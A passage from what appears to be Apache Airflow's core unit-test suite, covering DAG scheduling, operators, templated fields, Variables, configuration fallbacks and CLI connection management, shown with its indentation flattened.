.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
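# Illustrative note (not part of the test suite): the two tests above rely on
# Airflow's environment variable override convention AIRFLOW__<SECTION>__<KEY>,
# e.g. AIRFLOW__CORE__FERNET_KEY overrides the [core] fernet_key setting, and
# an explicitly set empty value still takes precedence over the config file.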
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# Check that the recorded failure duration covers at least the 3 second timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
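# Illustrative note (not part of the test suite; the link to the *_cmd options is
# an inference): run_command is the helper used for command-backed config values
# such as fernet_key_cmd (exercised earlier via FERNET_KEY_CMD); the test above
# only asserts that it returns decoded stdout and raises AirflowConfigException
# on a non-zero exit code.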
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Verify that the connections were added as expected
        for index in range(1, 7):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
